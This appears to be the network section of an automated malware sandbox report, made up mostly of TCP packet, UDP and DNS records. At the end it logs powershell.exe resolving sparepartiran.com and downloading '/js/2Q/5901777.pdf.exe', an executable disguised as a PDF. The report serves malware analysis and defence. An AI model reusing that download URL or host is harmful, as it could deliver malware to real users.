                                              Nov 27, 2020 11:38:09.691296101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691313982 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691353083 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691390038 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691416979 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691428900 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691448927 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691472054 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691519022 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691521883 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691561937 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691600084 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691639900 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691653967 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691732883 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691752911 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691793919 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691849947 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691879034 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691916943 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691956997 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.691976070 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.691996098 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692033052 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692073107 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692073107 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692111969 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692130089 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692159891 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692203045 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692217112 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692241907 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692282915 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692313910 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692320108 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692358971 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692384958 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692397118 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692523003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692528009 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.692560911 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.692643881 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.695804119 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.696302891 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.696332932 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.696362019 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.696391106 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.696407080 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.696458101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.699497938 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699527979 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699556112 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699590921 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699613094 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.699654102 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.699681997 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699734926 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.699795008 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.702357054 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.702389002 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.702416897 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.702445984 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.702459097 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.702474117 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.702527046 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.702569962 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.703304052 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.703326941 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.706103086 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.706134081 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.706167936 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.706198931 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.706288099 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.706312895 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.710325003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.710361004 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.710391998 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.710419893 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.710452080 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.710481882 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.711565018 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.711594105 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.711622000 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.711644888 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.711680889 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.711704969 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.712621927 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.714629889 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.714670897 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.714708090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.714730978 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.714754105 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.714833975 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.719959021 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.722667933 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.722712994 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.722796917 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.729607105 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.731635094 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.731687069 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.731729031 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.731766939 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.731791019 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.731823921 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.732017040 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.732057095 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.732110977 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.737674952 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.809746981 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.809808016 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.809848070 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.809894085 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.809912920 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.809962988 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.813345909 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813447952 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813524961 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.813548088 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813594103 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813633919 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813663960 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.813673019 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813720942 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813762903 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.813777924 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.813826084 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.815713882 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815779924 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815821886 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815839052 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.815860987 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815902948 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815942049 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815948963 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.815979958 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.815990925 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816020012 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816059113 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816080093 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816107988 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816154003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816154003 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816191912 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816231012 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816231012 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816272020 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816308975 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816315889 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816349030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816389084 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816390991 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816437960 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816481113 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816513062 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816519022 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816560030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816592932 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816601992 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816641092 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816663027 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816679955 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816719055 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816724062 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816766977 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816809893 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816828012 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816848040 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816886902 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816926003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816940069 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.816965103 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.816976070 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817004919 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817042112 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817053080 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817090034 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817135096 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817147970 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817173958 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817214012 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817241907 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817253113 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817290068 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817313910 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817329884 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817368031 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817394972 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817451954 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817497969 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817502975 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817563057 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817600012 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817625046 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817640066 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817678928 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817715883 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817733049 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817754984 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817763090 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817794085 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817841053 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817883968 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817887068 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.819077969 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.822721958 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827645063 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827688932 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827725887 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827775002 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827780962 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827804089 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827845097 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827852964 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827884912 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827923059 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827934027 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827970982 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.828028917 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.830481052 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831528902 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831571102 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831609011 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831636906 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831646919 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831665993 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831691980 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831728935 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831774950 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831784964 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831820011 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831868887 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837738991 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837793112 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837831974 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837848902 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837868929 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837883949 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837924957 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837968111 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837984085 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839776993 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839786053 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839809895 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839833021 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839848995 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839888096 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839899063 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839926958 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839975119 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840028048 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840037107 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840065956 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840102911 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840115070 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840157986 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840197086 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840208054 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840238094 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840243101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840276003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840317965 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840322018 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840357065 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840389013 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840409994 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.854986906 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:11.104043961 CET4974380192.168.2.3162.223.88.131

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 27, 2020 11:36:28.906232119 CET5836153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:28.933271885 CET53583618.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:29.570267916 CET6349253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:29.611063004 CET53634928.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:38.939960003 CET6083153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:38.967020035 CET53608318.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:39.954265118 CET6010053192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:39.996702909 CET53601008.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:40.132668018 CET5319553192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:40.159857035 CET53531958.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:40.329982042 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:40.378119946 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:41.359257936 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:41.399657011 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.045535088 CET5302353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.072751999 CET53530238.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.358972073 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.399580002 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.721008062 CET4956353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.748132944 CET53495638.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:43.439760923 CET5135253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:43.475255013 CET53513528.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:44.374624014 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:44.410218000 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:48.390551090 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:48.426340103 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:52.144023895 CET5934953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:52.179600000 CET53593498.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:53.220006943 CET5708453192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:53.247128010 CET53570848.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:53.946345091 CET5882353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:53.973597050 CET53588238.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:54.777817965 CET5756853192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:54.804825068 CET53575688.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:55.010998964 CET5054053192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:55.037981987 CET53505408.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:55.484256983 CET5436653192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:55.511518955 CET53543668.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:56.209888935 CET5303453192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:56.250344992 CET53530348.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:57.942320108 CET5776253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:57.969628096 CET53577628.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:58.576900005 CET5543553192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:58.604027033 CET53554358.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:01.721138000 CET5071353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:01.760047913 CET53507138.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:10.614938974 CET5613253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:10.658346891 CET53561328.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:18.635252953 CET5898753192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:18.677719116 CET53589878.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:29.832556963 CET5657953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:29.859958887 CET53565798.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:33.467720985 CET6063353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:33.505007029 CET53606338.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:05.516347885 CET6129253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:05.543705940 CET53612928.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:08.529928923 CET6361953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:08.616806984 CET6493853192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:08.674444914 CET53636198.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:08.763250113 CET53649388.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:11.222491980 CET6194653192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:11.266062975 CET53619468.8.8.8192.168.2.3

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 27, 2020 11:38:08.529928923 CET192.168.2.38.8.8.80x7f0Standard query (0)sparepartiran.comA (IP address)IN (0x0001)
                                              Nov 27, 2020 11:38:08.616806984 CET192.168.2.38.8.8.80x37a5Standard query (0)sparepartiran.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 27, 2020 11:38:08.674444914 CET8.8.8.8192.168.2.30x7f0No error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)
                                              Nov 27, 2020 11:38:08.763250113 CET8.8.8.8192.168.2.30x37a5No error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • sparepartiran.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.349743162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 27, 2020 11:38:08.837831020 CET4976OUTGET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:08.958857059 CET4978INHTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
